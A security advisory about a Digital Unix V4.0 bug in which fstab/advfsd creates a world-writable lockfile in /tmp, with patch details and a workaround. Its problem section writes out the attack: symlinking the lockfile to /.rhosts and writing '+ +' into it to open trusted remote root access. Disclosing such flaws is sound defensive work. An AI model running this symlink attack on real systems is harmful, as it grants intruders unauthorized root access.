COMMAND

    fstab/advfsd

SYSTEMS AFFECTED

    Digital Unix V4.0, 4.0a, 4.0b, 4.0c, 4.0d

PROBLEM

    'Low  Noise'  posted  following.   Program  involved  are: fstab -
    Static  information  about  file  systems  and swap partitions and
    advfsd -  Starts the  AdvFS graphical  user interface  daemon.  It
    works fine.  The only problem is that it creates a lockfile in tmp
    with nice permitions.  Let's see:

    /tmp>ls -la

    -rw-rw-rw-   1 root     system    0 Nov xx 15:49 fstab.advfsd.lockfile

    Very  bad  people  will  do  something  like following.  Before it
    creates lock file, do this:

    ln -s /.rhosts /tmp/fstab.advfsd.lockfile

    From here... cat "+ +" > /tmp/fstab.advfsd.lockfile , etc etc.

SOLUTION

    Digital strongly recommends upgrading to a minimum of Digital UNIX
    V4.0b accordingly, and that the appropriate patch kit be installed
    immediately.   This potential  security problem  has been resolved
    and an official patch for this problem has been made available  as
    an    early    release    kit     for    DIGITAL    UNIX     V4.0a
    (duv40ass0000600037800-19980317.*)  and  included  in  the  latest
    DIGITAL UNIX V4.0b and V4.0d aggregate DUPATCH Kit:

        The V4.0 aggregate  BL 9 patch kit #6
         is scheduled for release mid May 1998.
        The V4.0c aggregate BL10 patch kit #6
         is scheduled for release mid May 1998.

    Go to:

        http://www.service.digital.com/html/patch_service.html

    and then choose the appropriate version directory and download the
    patch accordingly.   The appropriate patch  kit must be  installed
    following any upgrade to V4.0a,  V4.0b or V4.0d.  As  a workaround
    you may touch lock file and make appropriate permissions.